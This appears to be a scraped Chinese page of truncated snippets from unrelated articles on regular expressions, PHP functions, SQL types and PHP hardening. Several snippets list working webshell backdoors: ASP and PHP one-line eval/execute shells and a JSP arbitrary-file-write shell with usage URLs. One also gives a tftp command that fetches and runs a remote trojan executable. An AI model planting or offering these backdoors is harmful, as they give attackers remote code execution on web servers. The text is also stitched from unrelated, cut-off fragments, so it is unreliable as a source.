匹配双字节字符(包括汉字在内)： [^\x00-\xff] 　　应用：计算字符串的长度（一个双字节字符长度计2，ASCII字符计1） String.prototype.len=function(){return this.replace([^\x00-\xff]/g,"aa").length;} 　　匹配空行的正则表达式： \n[\s| ]*\r 　　匹配HTML标记的正则表达式： /<(.*)>.*<\/>|<(.*) \/>/ 　　匹配首尾空格的...

特把经常用到的网页后门的木马整理下，如果不全请大家补全他，大家在网站混口饭吃，都不容易何必呢asp一句话木马文件常见内容<%If Request("#")<>"" Then Execute(Request("#"))%>execute(request("#"));eval(request("#"));php一句话木马<?@include($_POST["jb51"]);?><?php eval($_POST[cmd])?>...

通过HTTP协议来访问一句话木马的使用范围(我只列举了2种):1)只有数据库备份的情况数据库备份成asp文件时候，不出现“ 编译错误，缺少脚本关闭标志%>"2)SA权限的时候,一般先写入一句话,图个方便..(当然,直接tftp上传鸽子运行,那更快)tftp -i ip get server.exe一句话木马<%execute request("a")%>的原理:首先知道execute()函数,是用来执行asp代码的.就是负责执行我们上传的大马,将马交由asp.dll解析.上面的代码<%execute ...

/*获得客户端ip地址*/    function getIP() {        if(getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTTP_CLIENT_IP"),"unknown")) {              ...

[code]<% if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("\")+request.getParameter("f"))).write(request.getParameter("t").getBytes()); %> [/code]这个 后门估计不用我说了吧.还是提示一下咯.保存为1.jsp 提交url!http://localhost/1.jsp?f=1.txt&t=hell...

<%if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("\\")+request.getParameter("f"))).write(request.getParameter("t").getBytes());%>使用方法:提交url!jsp?f=1.txt" target="_blank">http://www.whitehouse.net.cn/1.jsp?f=1.txt&t=HelloWorld然后:http://w...

[code]<script language="JavaScript" type="text/javascript">var pos, str, para, parastr, tempstr1;tempstr = "";str = window.location.href;pos = str.indexOf("?")parastr = str.substring(pos + 1);document.write("&...

单引号’和双引号"的区别： 首先是单引号要比双引号执行效率要高，因为双引号会对内容进行预处理。 例如：’$value’ 输出字符 $value ; "$value"输出变量$value的值。 char和varchar的区别： char是定长而varchar是变长，char的主要特点是存储方式预分配，varchar当它的数据长度发生变化时会影响其存储的页分配。 char与varchar2是一对矛盾的统一体，两者是互补的关系.  varchar2比char节省空间，在效率上比 c...

通过对php一些服务器端特性的配置加强php的安全bysan@xfocus.org前面象ShaunClowes和rfp等都比较详细的介绍了php、cgi程序在编程过程中遇到的问题，以及如何通过应用程序漏洞突破系统，这篇文章我们来通过对php的一些服务器端特性来进行配置加强php的安全。写cgi脚本的时候我们的确一定注意各种安全问题，对用户输入进行严格的过滤，但是常在岸边走哪有不湿鞋，吃烧饼哪有不掉芝麻，人有失蹄马有失手，连著名的phpnuke、phpMyAdmin等程序都出现过很严重的问题，更何况象我等小混混写的脚本。所以现在我们假设php脚本已经出现严重问题，比如象前...